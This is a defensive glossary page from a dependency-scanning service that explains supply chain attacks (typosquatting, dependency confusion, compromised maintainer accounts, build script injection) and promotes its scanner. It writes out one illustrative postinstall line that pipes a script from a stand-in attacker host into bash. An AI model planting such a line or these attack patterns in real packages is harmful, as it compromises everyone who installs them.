PackageFix / Glossary / Supply Chain Attack

Supply Chain Attack

All ecosystems
Definition

A supply chain attack targets the tools, libraries, and services your code depends on rather than your code itself. Instead of breaking into your application directly, attackers compromise a dependency you trust — then everyone who installs that dependency gets the malicious code automatically.

Why it's hard to defend against

When you write npm install express, you're trusting Express and every package Express depends on. A modern Node.js application might have 500-1000 transitive dependencies — packages you've never heard of, maintained by people you've never met. An attacker only needs to compromise one of them.

The attack is particularly effective because the malicious code arrives through your normal build process. It looks identical to a legitimate dependency update. By the time anyone notices, the code has been running in production for days or weeks.

Common attack patterns

Compromised maintainer account

An attacker gains access to a package maintainer's npm or PyPI account and publishes a malicious version. The package's download count and reputation stay intact — only the code changes. The event-stream incident (2018) and dozens of others since have used this pattern.

Typosquatting

Register a package with a name one typo away from a popular package. expres instead of express. Wait for developers to mistype and install the malicious version.

Dependency confusion

If your company uses private packages with certain names, an attacker can register those same names on the public registry. Some package managers will fetch the public version instead of the private one.

Build script injection

Add curl https://attacker.com/payload.sh | bash to a package's postinstall script. Runs automatically when anyone installs the package.

Real examples that hit production

Check your dependencies for CVEs, CISA KEV entries, and supply chain risks.

Open PackageFix →

Free · No signup · No CLI · Runs in your browser

Common questions

How is a supply chain attack different from a regular vulnerability?
A regular vulnerability is a bug in code — it exists but hasn't been exploited yet. A supply chain attack is an active, intentional attack — someone deliberately puts malicious code into a package that developers trust and install.
Does npm audit catch supply chain attacks?
No. npm audit only checks for known CVEs in the vulnerability database. It doesn't detect malicious code added to a package, compromised maintainer accounts, or typosquatting. Those require behavioral analysis and supply chain-specific detection.
What does PackageFix check for supply chain attacks?
PackageFix checks for: Unicode/invisible characters in scripts (Glassworm), packages dormant for 12+ months that suddenly updated (zombie packages), package names one character from popular packages (typosquatting), curl/wget in postinstall scripts (build script injection), and packages flagged on the CISA KEV catalog.
Can I completely prevent supply chain attacks?
No — but you can significantly reduce your exposure. Keep dependencies updated, use lockfiles, pin specific versions in CI, and scan manifests regularly with tools like PackageFix.

Related guides

5 Supply Chain Attacks npm Misses

Attack patterns with detection methods

Dependency Confusion

Private package name attack

Typosquatting

One character off

CISA KEV Packages

Actively exploited right now